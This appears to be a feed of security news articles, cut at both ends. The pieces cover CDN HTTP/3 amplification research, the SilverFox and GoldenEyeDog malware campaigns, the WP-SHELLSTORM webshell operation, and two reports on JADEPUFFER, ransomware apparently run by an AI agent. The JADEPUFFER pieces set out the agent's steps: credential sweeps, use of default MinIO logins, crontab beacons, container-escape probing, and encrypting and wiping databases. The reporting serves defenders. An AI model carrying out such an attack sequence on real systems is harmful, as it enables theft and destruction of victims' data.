themselves, with the origin capped at 100 Mbps and the attacker at 30 Mbps, and no test above those figures is reported. The paper states that the attacks scale to higher-capacity servers, a claim it does not test. The amplification factor was also found to peak near 64 concurrent streams and then decline, which the researchers attribute to CPU overhead at the CDN edge. However, no edge CPU measurements are presented. To gauge exposure, the team enumerated subdomains under the Tranco Top 1M list, crawled their CNAME and NS records, matched them against known CDN-assigned suffixes, and probed each one using aioquic. That produced 151,685 subdomains hosted by the six providers, of which 42,330 responded to an HTTP/3 request and were labeled potentially vulnerable, with the largest counts from CloudFront (17,431), Cloudflare (12,371), and Fastly (11,606). The probe establishes only that the CDN edge responds to HTTP/3, and that no origin server outside the researchers' own test setup was attacked. The results are compared in the paper to CDN Judo, a 2020 study of the equivalent HTTP/2-to-HTTP/1.1 conversion at CDNs, which reported factors of roughly 44x with the static table and 166x with the dynamic table. The mitigations put to the vendors are applied at the CDN, and are as follows - Cap the size of any single header field entry inserted into the QPACK dynamic table, suggested at 512 bytes Limit how many times one dynamic table entry can be referenced within a single stream, suggested at no more than 10 Enforce a maximum decompressed HTTP/1.1 request size and reject anything above it before forwarding, suggested at 64KB Buffer the complete HTTP/3 request, both HEADERS and DATA frames, before opening a CDN-to-origin connection Limit the number of CDN-to-origin connections a single HTTP/3 client connection can trigger Time out CDN-to-origin connections independently of the client connection, suggested at 30 seconds without meaningful forwarded data Tencent's deployed mitigations limit the number of CDN-to-origin connections and restrict the size of headers in the dynamic table, per the disclosure section of the paper, which also records bug bounty awards of approximately $350 from Baidu and $150 from Tencent. The same section states that the other four vendors acknowledged the disclosure and were still discussing the findings internally. The paper does not report whether the attacks were retested after Baidu and Tencent deployed their mitigations, and does not say whether the attack code or the measurement framework will be published. The work is credited to researchers at the National University of Singapore, Fuzhou University, the University of Sheffield, and Johns Hopkins University. It is due to be presented at the Symposium on Reliable Distributed Systems in Rome from September 22 to 24, 2026. The QPACK dynamic table was the subject of a separate flaw disclosed on July 8, when FoxIO researcher Sébastien Féry reported that roughly 260 bytes of spec-compliant QPACK traffic could crash any server running XQUIC, Alibaba's QUIC and HTTP/3 library, which provides HTTP/3 support for the Tengine web server Alibaba runs across its cloud and CDN infrastructure. The development comes as the OpenSSL Project, on August 13, disclosed CVE-2026-14456, a low-severity flaw in which a QUIC server queues incoming channels for unknown destination connection IDs without enforcing any limit, with a fix that "introduces a limit for pending connections," set by default to 256. Cloudflare, in its H1 2026 DDoS Threat Report published the same week, said the attack-vector "center of gravity shifted from botnet floods to reflection and amplification," with DNS-based attacks accounting for 34.3% of all network-layer activity in the first half of 2026.
thehackernews.comAug 20, 2026extracted
SilverFox Targets Japanese Manufacturer with 3-Driver BYOVD Chain and ValleyRAT
The Chinese cybercrime group known as Silver Fox has been observed using new drivers as part of bring your own vulnerable driver (BYOVD) attacks targeting a Japanese organization in the industrial manufacturing sector to ultimately deliver ValleyRAT (aka Winos 4.0) for persistent remote access. "In this campaign, the group combines new vulnerable-driver abuse, newly observed abuse of legitimate applications for DLL sideloading, defense evasion, and layered recovery mechanisms to keep ValleyRAT running," Cato Networks researchers Shani Kurtzberg, Tomer Pugach, Dr. Guy Waizel, Zohar Buber, Idan Tarab, and Shani Kurtzberg said in an analysis. The attack chain begins with an invoice-themed phishing lure that uses attacker-controlled content hosted on legitimate QQ and Tencent Cloud services to trigger a DLL side-loading chain via a ZIP archive that paves the way for the deployment of ValleyRAT, but not before leveraging the BYOVD technique to obtain kernel access and impair security controls on the compromised host to evade detection. The ZIP archive contains a downloader executable that retrieves the next-stage components necessary for DLL side-loading from an attacker-controlled Tencent Cloud infrastructure. While Silver Fox has previously leveraged this method using the legitimate-but-vulnerable "amsdk.sys" and "wsftprm.sys" drivers, the latest campaign marks the use of two other drivers: "BootRepair.sys" and "EnPortv.sys," which have not been publicly reported in connection with prior attack waves. Specifically, the malicious DLL ("PDFCORE8.dll") sideloaded by "ConvertToPDF.exe" or "PDFDirect.exe" embeds " BootRepair.sys ," " EnPortv.sys ," and wsftprm.sys ," turning the malware into a modular three-driver BYOVD framework for defense evasion. Both legitimate binaries are associated with Zeon Corporation. The idea behind incorporating three different drivers is to ensure operational resilience across environments and turn the BYOVD implementation into a plug-and-play system that allows the operators to swap out the drivers and replace them with other options while keeping the rest of the workflow intact. On top of that, the malware uses NTDLL unhooking to remove user-mode inline hooks placed by endpoint security software to keep tabs on native Windows API activity. "The malware integrates Bring Your Own Vulnerable Driver (BYOVD), DLL side-loading, NTDLL unhooking, process injection, registry-based payload storage, and two independent recovery mechanisms to impair security controls and maintain execution," the researchers said. The DLL loader, which acts as a self-contained execution framework, is also responsible for unleashing a watchdog batch script that ensures persistence by means of a scheduled task and communicates with an external server ("43.128.26[.]132") to fetch shellcode that's injected into a new "svchost.exe" process using a technique called thread-context hijacking. The resulting final-stage implant is ValleyRAT, a variant of Gh0st RAT that offers remote-access functionality, including command-and-control (C2) communication, task execution, and additional post-compromise capabilities. A defining aspect of the attack sequence is its dual watchdog design that ensures execution recovery. It pairs an internal routine that monitors the injected payload with the aforementioned external watchdog script that monitors the loader behind the creation of that payload. This two-pronged approach means that terminating one component alone may not completely neutralize the intrusion. If the injected payload exits, it's recreated by the loader. If the loader itself gets terminated, the watchdog script springs into action to relaunch it. "This layered design increases resilience because defenders must interrupt both components and prevent either from restoring the other stage," Cato said. "The recovery architecture also reinforces the modularity observed throughout the sample. Driver deployment, security-process termination, injection, payload monitoring, and loader recovery are implemented as coordinated components rather than isolated techniques." The disclosure comes as Silver Fox continues to actively refine and expand its arsenal with new tools, such as Atlas RAT (aka AtlasCross RAT), RomulusLoader, and SilentRunLoader , even as the group utilizes tax-themed lures to deliver Gh0st RAT and DCRat . In a report published this week, a South Korean cybersecurity company said its 180-day retrohunt of the VirusTotal corpus identified 146 unique samples of Atlas RAT spanning six versioned PDB builds, two development environment usernames, and 27 heuristic lineages. "It is noted that such scale and diversity are inconsistent with management by a single operator, raising the possibility that the malware was commercially developed or distributed privately," the company said. "However, the link to Silver Fox has only been suggested based on circumstantial evidence, and there is insufficient evidence to conclusively determine that they are the same operator."
thehackernews.comJul 30, 2026extracted
GoldenEyeDog Subgroup Linked to DigiCert Breach and Code-Signing Certificate Theft
Cybersecurity researchers have attributed the April 2026 DigiCert security incident to a threat activity cluster dubbed CylindricalCanine. Expel, which shared technical details of the event, described the threat actor as a sub-group of GoldenEyeDog (aka APT-Q-27, Dragon Breath, and Miuuti Group), a Chinese cybercrime group known for its targeting of the gambling and gaming sectors using counterfeit websites to push malware-laced software. It's known to be active since at least 2015. "In April 2026, GoldenEyeDog used their malware to access a support member's device at DigiCert, a code-signing certificate provider, and leveraged their access to steal certificates intended for DigiCert customers," Expel security researcher Aaron Walton said in an analysis. "This attack highlighted the capability of the malware and operators." Central to the threat actor's operations is a modified version of Gh0st RAT (aka Farfli), a remote access trojan (RAT) widely used by Chinese hacking groups, including another prolific Chinese cybercrime group tracked as Silver Fox. The modular malware, referred to as Golden Gh0st RAT, is delivered by means of Golden Gh0st Loader. In a report published in November 2025, Elastic Security Labs detailed the adversary's use of a multi-stage loader codenamed RONINGLOADER to distribute a Gh0st RAT variant through NSIS installers masquerading as legitimate programs like Google Chrome and Microsoft Teams. Expel told The Hacker News that RONINGLOADER is likely used by a different threat cluster within GoldenEyeDog, which it hypothesized as consisting of multiple distinct teams. Recent iterations of RONINGLOADER have been identified as recently as January 2026. Earlier this year, another campaign linked to the hacking group was observed orchestrating a multi-stage attack directed at customer support staff working for Web3 companies, using suspicious links sent via customer support chat to deliver Gh0st RAT. "These actors are using malware and targeting victims consistent with other Chinese cybercrime activity, including targeting finance organizations in the Asia-Pacific region," Expel said. "The malware targets finance organizations in the Asia-Pacific region." Golden Gh0st RAT shares behavioral and tactical overlaps with a payload detected by Chinese security vendor QiAnXin back in 2020 in connection with an attack campaign aimed at the gambling industry since 2019. It also overlaps with a malware documented by ANY.RUN in February 2025 as Zhong Stealer. The DigiCert Compromise What's more, CylindricalCanine has been observed abusing code-signing certificates, gaining unauthorized access to DigiCert to intercept code-signing certificates intended for DigiCert customers, and then using them to sign their own malware to avoid detection. In April 2026, the certificate authority (CA) revealed it revoked certificates fraudulently obtained from its internal support portal after a then-unknown threat actor gained access to two support analyst workstations by executing a malicious payload delivered via a customer chat channel. "On 2026-04-02, a threat actor contacted DigiCert's support team via a customer chat channel and delivered a ZIP file disguised as a customer screenshot," DigiCert explained at the time. "The file contained a .scr executable with a malicious payload." "The threat actor used a limited function within the customer-support portal, which allows authenticated DigiCert support analysts to access customer accounts from the customer's perspective to facilitate support tasks. The threat actor was able to use this function to access initialization codes for orders that were approved but pending delivery for EV Code Signing certificate orders across a finite set of customer accounts." The fatal oversight here was that the possession of an initialization code, coupled with an approved order, was "functionally sufficient" to obtain EV Code Signing certificates across a set of customer accounts and CAs. The company said it revoked 60 certificates issued by the following CAs - DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1 DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 GoGetSSL G4 CS RSA4096 SHA256 2022 CA-1 Verokey High Assurance Secure Code EV Of these, 27 are said to have been explicitly linked to the threat actor, with the exploited certificates weaponized to sign Zhong Stealer malware artifacts. "The threat model did not account for the scenario in which initialization codes stored within DigiCert's internal support portal could be viewed by a compromised DigiCert analyst account operating through the portal function," the company explained, adding it has since deployed a code change to mask initialization codes from proxied users on both E.U. and U.S. platforms using either the UI or API. Attack Chains Lead to Golden Gh0st RAT Expel said the primary tactic of CylindricalCanine is to distribute files disguised as screenshots in phishing emails. The files are embedded within the messages in the form of a link that, when clicked, downloads additional payloads from an external server. The end goal of the attack is to trigger a DLL side-loading chain, leveraging a legitimate executable to run a rogue DLL, while simultaneously opening a decoy PDF document displaying an HTTP 503 "Service Unavailable" error. The DLL then proceeds to load an encrypted payload ("update.log"). The final stage is Golden Gh0st RAT, which comes with a wide array of capabilities to set up persistence, steal sensitive data, start a SOCKS proxy tunnel, suppress display output, log keystrokes, take screenshots, enumerate processes, execute shell commands, drop additional payloads, and clear Windows Event logs. Some of the applications it specifically targets for data collection include Skype, Google Chrome, Mozilla Firefox, 360 Secure Browser, 360 Speed Browser, and Tencent QQ Browser. The findings make CylindricalCanine the latest addition to a list of threat actors, such as Black Basta, TamperedChef (aka EvilAI), and Rhysida, that are known to abuse code-signing certificates in their cyber operations. "Golden Gh0st RAT is used primarily in phishing emails and/or submissions to support portals (these submissions may themselves be emails received by a ticketing system)," Expel said. "As with all Gh0st RAT variants, the capability of the malware is handled through plugins and an internal module dispatcher."
thehackernews.comJul 17, 2026extracted
Exposed Hacker Server Reveals WP-SHELLSTORM Backdooring Thousands of WordPress Sites
A cybercrime crew left one of its own servers wide open on the internet for three weeks, and it exposed the operation's inner workings: the hacking tools, the activity logs, and target lists naming more than 1.4 million websites. Far fewer were actually broken into, but the exposed files showed researchers how a mass site-hacking operation runs from the inside. The operation, now tracked as WP-SHELLSTORM, is what SOCRadar calls a webshell access brokerage: a crew that breaks into sites at scale, plants a hidden backdoor (a "webshell") on each, and packages that access for resale. The strongest activity hit WordPress sites running out-of-date plugins. If you run WordPress or Joomla, the two flaws that mattered most were in the Breeze caching plugin and Joomla's JCE editor; skip to the checklist below if that's you. A forgotten server Two teams dug into the same exposed folder. SOCRadar's threat intelligence team spotted it on June 11, 2026, on a US-based rented server at 137.175.93[.]126 with no password on it at all. Inside was roughly 800MB across 434 files: webshells, exploit scripts, scan results, the operator's typed command history, and command-and-control settings. Ctrl-Alt-Intel had analyzed the same directory too, having found it on Hunt.io's open-directory platform, and published on June 22, weeks before SOCRadar's own July 9 writeup. The exposure came down to a basic slip: the operator started a simple Python web server to move files around and left it running for 22 days. The crew took publicly known bugs in website plugins, most of them in WordPress, and built automated scanners to fire those exploits at massive target lists pulled from FOFA, a Chinese search engine for internet-connected systems, similar to Shodan. Where a site ran a vulnerable version, the exploit could upload a webshell: a small script that lets the attacker run commands on the server from anywhere, read files, steal passwords, and move deeper into the network. The toolkit covered 27 known flaws, though a handful did most of the work. The biggest producer was a bug in the Breeze caching plugin (CVE-2026-3844), which the crew fired at more than 45,000 targets and, by its own count, backdoored over 17,000 of them. That one comes with a catch: it only works when a non-default "Host Files Locally – Gravatars" setting is switched on, so most Breeze installs were never exposed. The numbers, in plain terms The headline figure needs a caveat. The 1.4 million count is how many domains were on the target lists, not how many were broken into, and those lists spanned WordPress, Joomla, and other platforms. The single largest file was a list of 587,034 Joomla targets. The number actually compromised was far smaller, and the two research teams measured it differently: Ctrl-Alt-Intel's deduplicated count found 25,195 sites with confirmed or validated compromise evidence, while SOCRadar, counting active webshells, put the live figure at 5,700-plus. One flaw shows the gap plainly: a Joomla bug was fired at more than 560,000 targets but landed on only 77 of them. Being on someone's scan list is not the same as being hacked. Keep that in mind whenever a report leads with a frightening target number. The tooling and an earlier campaign The main backdoor, a file named down.php, was heavily obfuscated, four layers deep, and appears to be derived from an open-source Chinese webshell called BestShell. Once running, it could manage files, run commands, open reverse shells, scan the network, and check which security software the host was running. For its own remote access, the crew used a SNOWLIGHT dropper to install VShell, a stealthy backdoor that disguises its process name as [kworker/0:2] to blend in with the kernel threads in a process list. Those two tools have a history: in April 2025, Sysdig linked this SNOWLIGHT-to-VShell chain to the suspected Chinese state group UNC5174, activity THN covered at the time. VShell itself, though, is a common tool in Chinese-speaking criminal circles, so its presence alone doesn't point to a state actor. The server also held traces of an earlier, very different job. SOCRadar found that before the noisy WordPress spree, the same crew ran a quieter campaign in early May 2026 against corporate Java systems. It pulled 613 configuration files from 11 systems across nine companies in fintech, e-commerce, logistics, gaming, and electronics. The haul included cloud login keys for AWS, Alibaba Cloud, Oracle, Tencent, and DigitalOcean, database passwords, and Alipay RSA private keys. It leaned on an old, well-known bug in Nacos, a configuration server (CVE-2021-29441), that lets an attacker skip the login by faking a single web header. SOCRadar reads the timing as a sequence: grab high-value corporate credentials first, then pivot weeks later to the higher-volume backdoor work, a funding round before scaling up. Sloppy tradecraft Both teams assess with medium-to-high confidence that the operator is Chinese or Chinese-speaking. They point to the fluent Simplified Chinese throughout the code and command history, the reliance on FOFA (which the researchers note needs a Chinese phone number to register), and the Godzilla and VShell tooling favored in Chinese-speaking forums. SOCRadar goes a step further, reading the crew as financially motivated rather than state-directed. Names in the files (tance, chen-kk, chenyk) are treated as loose leads, not proof. One loose end stands out: a single IP address in Taiwan made more than 42,000 requests downloading the crew's own tools. It could be a second operator, a customer, or another researcher. The logs cannot settle it. For a group running a genuinely capable toolchain, the crew was careless. It left the server open, left a FOFA config file that FOFA can trace through its law-enforcement channel, and left an unedited command history that laid the whole thing out. When it finally noticed it had been spotted, sometime between July 2 and July 4, it deleted a batch of log lines. Three weeks too late. The blunder is a familiar one. In March 2026, the same research shop caught Russia's Fancy Bear (APT28) the same way: a forgotten open directory spilled the group's phishing tools and logs, in a campaign Hunt.io called Operation Roundish. What to do now If you run any of the targeted software, check it today. These are not obscure bugs: two of them are under active exploitation elsewhere. Wordfence tracked tens of thousands of blocked attacks against the Everest Forms Pro flaw (CVE-2026-3300) this spring, and the Joomla JCE bug (CVE-2026-48907) is a maximum-severity flaw CISA has added to its Known Exploited Vulnerabilities list. WordPress and Joomla, first: patch Breeze (CVE-2026-3844, fixed in 2.4.5) if the non-default "Host Files Locally – Gravatars" setting is on; it produced the most backdoors here. Treat the Joomla JCE flaw (CVE-2026-48907, fixed in 2.9.99.5) as urgent too, since it is a maximum-severity and on CISA's actively-exploited list, even though it barely landed in this campaign. WordPress and Joomla, also check: ThemeREX Addons (CVE-2026-1969), Simple File List (CVE-2020-36847), Custom CSS JS PHP (CVE-2026-6433), BerqWP (CVE-2025-7443), Ninja Forms uploads (CVE-2026-0740), WavePlayer (CVE-2025-12057), WPBookit (CVE-2025-7852), and WP File Manager (CVE-2020-25213). Both reports list Simple File List under CVE-2025-34085, a now-rejected duplicate; the valid ID is CVE-2020-36847. Nacos: upgrade to 2.2.1 or later and turn authentication on (nacos.core.auth.enabled=true). If your instance was ever exposed, rotate every credential that lived in it, not just the obvious ones. XXL-Job and Spring Boot: close unauthenticated executor endpoints and disable /actuator/heapdump in production. Hunt for the backdoors: search for the crew's webshell filename patterns, such as .bd.php, .wp-log.php, and .brq-*.php. Then check any process named [kworker/X:Y]. A real kernel thread runs no program of its own, so its /proc/ /exe points to nothing. It also has no command line and no network sockets. A [kworker] that shows any of these is an impostor. Block the known infrastructure: 137.175.93[.]126, 43.108.17[.]80, and the domain xs.xxooonline[.]eu[.]cc. What makes WP-SHELLSTORM worth attention is not how advanced it is, but how ordinary. Public exploits, automated scanning, and a target list a million lines long were enough to compromise sites at scale, no zero-day required. The details are public only because the crew forgot to close its own server. The Hacker News has reached out to SOCRadar for further details on their findings and will update this story with any response.
thehackernews.comJul 10, 2026extracted
JADEPUFFER: il ransomware agentico che cambia le regole della cyber security
È stata ribattezzata JADEPUFFER la prima operazione ransomware che segna un punto di svolta nel mondo del cyber crimine: si tratta, infatti, della prima estorsione digitale documentata che è stata interamente gestita da un agente IA in grado di violare autonomamente una rete aziendale, adattarsi in tempo reale al target e cifrare un database di produzione in pochi minuti. Dunque, un vero e proprio cambio di passo in quanto il ransomware, da sempre, ha avuto un essere umano dietro la tastiera: anche quando l’esecuzione era automatizzata, strategia e correzione degli errori restavano un compito umano. Il Threat Research Team di Sysdig ha ora documentato quello che rappresenta, con ogni probabilità, il primo caso conosciuto di ransomware agentico: un’operazione di estorsione completa, condotta dall’inizio alla fine da un modello linguistico (LLM), senza supervisione operativa umana. Indice degli argomenti L’operatore, ribattezzato JADEPUFFER, ha ottenuto l’accesso iniziale a un’istanza Langflow (un framework open source diffuso per costruire applicazioni basate su LLM e workflow agentici) esposta su Internet sfruttando la vulnerabilità CVE-2025-3248, per poi condurre una campagna adattiva culminata nel pivot verso il vero bersaglio: un server di produzione con database MySQL e servizio di configurazione Nacos. I ricercatori di Sysdig hanno quindi classificato JADEPUFFER come un Agentic Threat Actor (ATA): un operatore la cui capacità offensiva non deriva da un toolkit scritto da mani umane, ma viene generata ed eseguita autonomamente da un agente IA, con un codice che si auto-commenta in linguaggio naturale e una capacità di correggere i propri errori a una velocità irraggiungibile per un operatore umano. Come dicevamo, l’accesso iniziale per il ransomware è stato individuato nella vulnerabilità CVE-2025-3248 di Langflow, una falla di autenticazione mancante nel suo endpoint di validazione del codice che consente l’esecuzione di codice Python arbitrario senza credenziali. Nonostante sia nota da tempo, la vulnerabilità continua a esporre migliaia di istanze su Internet: un bersaglio appetibile, perché questi server custodiscono spesso chiavi API e credenziali cloud nel proprio ambiente di esecuzione. Ottenuta l’esecuzione di codice, l’agente ha avviato in parallelo l’enumerazione dell’host (identità, rete, processi attivi) e una ricerca sistematica di segreti in categorie multiple: wallet di criptovalute e credenziali di database, chiavi API di provider LLM (OpenAI, Anthropic, DeepSeek, Gemini) e credenziali cloud con copertura esplicita dei provider cinesi Alibaba, Aliyun, Tencent e Huawei, oltre ai classici AWS, GCP e Azure. L’agente ha poi individuato un’istanza MinIO (object storage compatibile S3), sfruttando le credenziali predefinite mai cambiate (minioadmin:minioadmin), da cui ha estratto lo stato Terraform dell’infrastruttura e un file di credenziali applicative. Conun dettaglio rivelatore: quando una richiesta ha restituito XML anziché il JSON atteso, l’agente ha adattato istantaneamente il proprio parser, senza alcuna interruzione operativa. Ha infine installato una persistenza tramite crontab, con un beacon verso l’infrastruttura di comando e controllo ogni 30 minuti. Dagli artefatti raccolti sull’host Langflow emerge il vero bersaglio: un server di produzione esposto su Internet con database MySQL e servizio Nacos (piattaforma di service discovery e configurazione dinamica, diffusa nelle architetture a microservizi di matrice Alibaba), vulnerabile a un bypass di autenticazione noto dal 2021 (CVE-2021-29441) e dotato di una chiave di firma JWT predefinita, facilmente falsificabile nei sistemi non aggiornati. L’agente ha iniettato un account amministratore backdoor sfruttando un accesso root a MySQL di origine ignota. La sequenza è istruttiva: il primo tentativo di creazione dell’account fallisce silenziosamente per un problema di percorso di sistema nella generazione dell’hash bcrypt; 12 secondi dopo l’agente testa in parallelo due ipotesi di correzione; 19 secondi più tardi emette il payload risolutivo. In totale, 31 secondi tra fallimento e soluzione funzionante: un tempo irraggiungibile per un operatore umano. Nella stessa sessione, l’agente ha condotto per circa otto minuti test metodici di container escape sfruttando le primitive file di MySQL (“INTO OUTFILE” e “LOAD_FILE”), sondando l’accessibilità del socket Docker prima di chiudere l’attività con un marcatore di completamento. Nella fase finale, l’agente ha cifrato 1.342 elementi di configurazione Nacos con la funzione “AES_ENCRYPT()”, eliminato le tabelle originali e creato una tabella di estorsione (“README_RANSOM”) con richiesta di riscatto, indirizzo Bitcoin e contatto ProtonMail. Un altro dettaglio cruciale individuato dal ricercatori di Sysdig è stata la chiave di cifratura, generata casualmente tramite UUID e stampata una sola volta a schermo senza essere mai salvata né trasmessa all’attaccante. Ciò significa che, anche pagando, la vittima non potrebbe più recuperare i propri dati: l’estorsione è irrealizzabile fin dall’origine. A seguire, l’agente ha proceduto a una distruzione su vasta scala, eliminando interi schemi di database e motivando nel codice la scelta dei bersagli in base al presunto “ritorno sull’investimento” per l’attaccante: una logica generata da un modello linguistico più che da uno script prestabilito. I ricercatori Sysdig hanno quindi individuato quattro elementi che, nel loro insieme, escludono la presenza di un operatore umano al comando: Codice auto-narrante: i payload sono ricchi di commenti in linguaggio naturale che spiegano il perché di ogni azione, incluse valutazioni di priorità sui bersagli. Un tratto tipico della generazione via LLM, raro nello scripting umano usa-e-getta. Diagnosi e correzione a velocità macchina: oltre al caso dei 31 secondi, l’agente ha corretto in tempo reale anche un errore di integrità referenziale durante un “DROP DATABASE”, disattivando e riattivando i vincoli chiave esterna in modo mirato. Comprensione di contesto testuale: l’agente ha dimostrato di comprendere, non solo individuare tramite pattern matching, testo libero incontrato durante l’operazione, con comportamento coerente ripetuto in sessioni distanti settimane. L’ambiguità dell’indirizzo Bitcoin: l’indirizzo nella richiesta di riscatto è l’esempio canonico Pay-to-Script-Hash della documentazione ufficiale Bitcoin, un dato che satura i corpus di addestramento degli LLM. Sui blockchain explorer risulta però un wallet attivo con 737 transazioni e circa 46 BTC movimentati: non è certo se sia stato allucinato dal modello o configurato deliberatamente. In un’intervista rilasciata lunedì a CyberScoop, Michael Clark di Sysdig, direttore senior della ricerca sulle minacce dell’azienda, ha chiarito che una persona era comunque fortemente coinvolta — ma non nell’esecuzione tecnica. «È stato comunque un essere umano a impostare e dirigere l’operazione, a predisporre l’infrastruttura sottostante — il server di comando e controllo e il server di staging utilizzato per i dati rubati — e a scegliere la vittima», ha affermato Clark. Le credenziali utilizzate per violare il database della vittima, ha aggiunto, non sono state raccolte dall’agente di intelligenza artificiale stesso; qualcuno le ha ottenute separatamente, tramite una precedente violazione, e le ha fornite all’operazione. L’analisi di Sysdig porta a quattro conclusioni operative che meritano attenzione da parte di chi si occupa di sicurezza a livello strategico: Il ransomware non è più un mestiere per pochi esperti: un agente LLM concatena ricognizione, furto di credenziali, movimento laterale, persistenza e distruzione, senza che l’operatore possieda competenze approfondite in nessuna fase. Le vulnerabilità datate vengono automatizzate su scala: l’attacco sfrutta falle note da anni contro infrastrutture trascurate. Gli agenti azzerano il costo di testare l’intero catalogo storico di vulnerabilità, ampliando l’esposizione della “coda lunga” dei sistemi non aggiornati. L’intento diventa leggibile, un vantaggio per la difesa: la narrazione in linguaggio naturale generata dall’agente nei propri payload offre un’opportunità di rilevamento che i difensori non avevano con il malware tradizionale. L’esfiltrazione dichiarata non è una prova verificata: prima dei comandi distruttivi, il codice commentava che i dati erano “già salvati altrove”: un’affermazione generata dal modello, non confermata in modo indipendente da Sysdig. Le indicazioni tecniche di Sysdig si traducono, in ottica di compliance, in una checklist da portare all’attenzione del management, alla luce degli obblighi NIS2 su gestione del rischio di supply chain e notifica tempestiva degli incidenti (24 ore per il preallarme). In particolare, è importante portare a termine le seguenti attività operative: Applicare tempestivamente la patch per CVE-2025-3248 e non esporre mai su Internet endpoint di validazione o esecuzione di codice. Non far girare server di orchestrazione IA (Langflow e simili) con chiavi API o credenziali cloud presenti nell’ambiente di esecuzione: isolarle in un secret manager dedicato. Cambiare la chiave di firma JWT predefinita di Nacos, non esporlo mai su Internet e non fargli usare un account root verso il database di backend. Non esporre mai account amministrativi di database su Internet: applicare credenziali forti, uniche, e restrizioni per indirizzo IP sorgente. Introdurre controlli di egress che impediscano a un host applicativo compromesso di comunicare con destinazioni arbitrarie o server di staging esterni. Adottare soluzioni di rilevamento runtime in grado di individuare comportamenti anomali nei processi che interagiscono con i database. Monitorare gli indicatori di compromissione pubblicati (IP di comando e controllo, pattern di beaconing via crontab, anomalie nello User-Agent) e integrarli nei propri feed di threat intelligence. L’episodio, inoltre, dovrebbe spingere le aziende soggette a NIS2 e DORA ad aggiornare i piani di incident response includendo scenari completamente automatizzati, in cui il tempo di reazione dell’attaccante si misura in secondi: un piano tarato sui tempi umani della minaccia tradizionale rischia di arrivare sistematicamente in ritardo. Il quadro descritto da Sysdig conferma una tendenza che seguiamo da tempo su Cybersecurity360: l’IA agentica abbassa drasticamente la soglia di competenza necessaria per condurre attacchi complessi. Non servono più operatori esperti in ogni fase della kill chain: basta un agente ben orchestrato e le vulnerabilità note da anni, mai patchate e mai monitorate, diventano il vero moltiplicatore di rischio. Nessuna delle tecniche impiegate da JADEPUFFER, infatti, è di per sé sofisticata o inedita: ciò che colpisce è che un modello IA le abbia concatenate in un’operazione di estorsione completa, senza alcun intervento umano nel ciclo decisionale. La soglia di competenza per condurre un attacco ransomware si è abbassata al costo di far girare un agente. E se quell’agente opera su risorse di calcolo rubate tramite LLMjacking, il costo per l’attaccante tende a zero. Per i difensori, il messaggio è chiaro: server applicativi esposti, sistemi di configurazione non irrobustiti e account amministrativi raggiungibili da Internet sono destinati a diventare le prime superfici colpite da una nuova generazione di campagne agentiche. Dunque, la domanda che ogni azienda dovrebbe porsi non è più “siamo un bersaglio interessante”, ma “quali dei nostri sistemi esposti un agente IA troverebbe e sfrutterebbe in autonomia, questa notte stessa”.
cybersecurity360.itJul 7, 2026extracted
AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack
Security firm Sysdig says it has found what it believes is the first ransomware attack run from start to finish by an AI agent. Its Threat Research Team calls the operator JADEPUFFER and says a large language model handled the whole job: breaking in, stealing credentials, moving deeper into the network, then encrypting and wiping a company's production database. Ransomware has always needed a skilled person somewhere in the loop, either at the keyboard or writing the script the malware follows. If a model can chain those steps on its own, the skill needed to run an attack drops to whatever it costs to rent an AI agent. The way in was an old, already-patched bug. JADEPUFFER exploited CVE-2025-3248, a missing-authentication flaw in Langflow, an open-source tool for building AI apps and agent workflows. The flaw lets anyone who can reach the server run their own Python code on it, no login needed. Langflow boxes are a tempting target because they often sit exposed on the internet and hold API keys and cloud credentials for the services they connect to. The flaw was fixed in Langflow 1.3.0 and added to CISA's Known Exploited Vulnerabilities list in May 2025, but plenty of servers were never updated. It is not even the only Langflow bug being hit this way. Once inside, the agent worked fast and cleaned up after itself. It mapped the machine, then swept it for secrets: API keys for AI services (OpenAI, Anthropic, DeepSeek, Gemini), cloud credentials (Chinese providers like Alibaba and Tencent alongside AWS, Google, and Azure), crypto wallet keys, and database logins. It raided a MinIO storage server using its factory-default login (minioadmin:minioadmin), which had never been changed. It also set up a way back in, adding a scheduled task that pinged the attacker's server every 30 minutes. Then it pivoted to its real target: a separate, internet-facing server running a MySQL database and Alibaba's Nacos, a settings and service directory common in microservice setups. The agent logged into the database as root. Sysdig says it never saw where those root credentials came from, so their origin is unknown. From there, it took over Nacos using a 2021 authentication bypass (CVE-2021-29441) and a default signing key that Nacos has shipped unchanged since 2020, then planted its own admin account. The Ransom Note With No Key The agent encrypted all 1,342 Nacos settings, dropped the original tables, and left a ransom note demanding Bitcoin with a Proton Mail contact. It generated a random encryption key, printed it to the screen once, and never saved or sent it anywhere. There is no key to hand over. The victim cannot get the data back even if they pay. (The note claims AES-256; Sysdig notes the tool it used defaults to weaker AES-128, though the result is the same.) It then went further, deleting whole databases and leaving a comment in its own code claiming it had already copied the data somewhere else. Sysdig says that is the agent talking, not something the team could confirm, and found no evidence that any data was actually left. How Experts Know an AI Was Driving The clearest sign was the code itself. The attack payloads were full of plain-English notes explaining why each step was being taken, the running commentary a human hacker never bothers to write, but a model produces by default. The agent also fixed its own mistakes at machine speed. In one case, it went from a failed login to a correct, multi-step fix in 31 seconds, diagnosing the exact cause instead of blindly retrying. Sysdig counted more than 600 separate, purposeful payloads across the operation. One detail is still a puzzle. The Bitcoin address in the ransom note is the exact sample address that appears throughout Bitcoin's own developer documentation, which means it shows up all over the text these models are trained on. It is also a real, active wallet with a long history of payments. Sysdig cannot tell whether the model simply pasted a familiar-looking address from memory, or whether the operator deliberately used a real wallet that happens to match the famous example. Part of a Bigger Shift JADEPUFFER is the latest step in a fast-moving year for AI-driven attacks. In August 2025, researchers at ESET flagged PromptLock, billed as the first AI-powered ransomware; it later turned out to be a lab prototype from NYU called Ransomware 3.0, not a real attack. Around the same time, Anthropic reported a real extortion campaign that used its Claude Code tool to hit at least 17 organizations, with demands topping $500,000, though a human still steered that one. In November 2025, Anthropic disclosed what it called the first largely autonomous cyberattack, a Chinese state-linked spying effort that had Claude write exploits and steal data with little human help. That operation also had the AI inventing credentials that did not exist, possibly the same kind of hallucination behind JADEPUFFER's odd Bitcoin address. The pieces of a serious attack are getting automated, and old, unpatched software is the easy first target. Agents make spraying the entire back catalogue of known bugs nearly free, so neglected servers get more exposed, not less. What Defenders Should Do The fixes are familiar. Patch Langflow and never expose its code-running endpoints to the internet. Do not run AI tools with cloud keys and provider credentials sitting in their environment; keep secrets in a proper manager, away from anything the web can reach. Harden Nacos: change the default signing key, keep it off the public internet, and never let it connect to its database as root. Never expose a database's admin account to the internet, and lock down outbound traffic so 